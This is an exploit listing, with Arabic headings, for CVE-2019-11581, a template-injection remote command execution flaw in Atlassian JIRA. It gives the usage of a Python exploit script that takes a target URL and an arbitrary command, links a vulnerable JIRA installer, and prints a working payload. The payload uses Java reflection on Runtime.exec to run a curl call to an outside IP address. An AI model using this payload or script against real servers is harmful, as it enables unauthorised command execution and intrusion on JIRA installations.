## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAS502N-CVE-2019-11581
# CVE-2019-11581
## ثغرة حقن القوالب في Atlassian JIRA وتنفيذ الأوامر عن بُعد (RCE)
## عرض توضيحي
`python CVE-2019-11581.py http://xx.xx.xx.xx:8080/ "Command"`

### تحميل الإصدار المعرّض للثغرة
`https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe` 
### إثبات المفهوم (PoC)
root@kitploit:~
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl 47.97.112.98:8000//jas502n//').waitFor()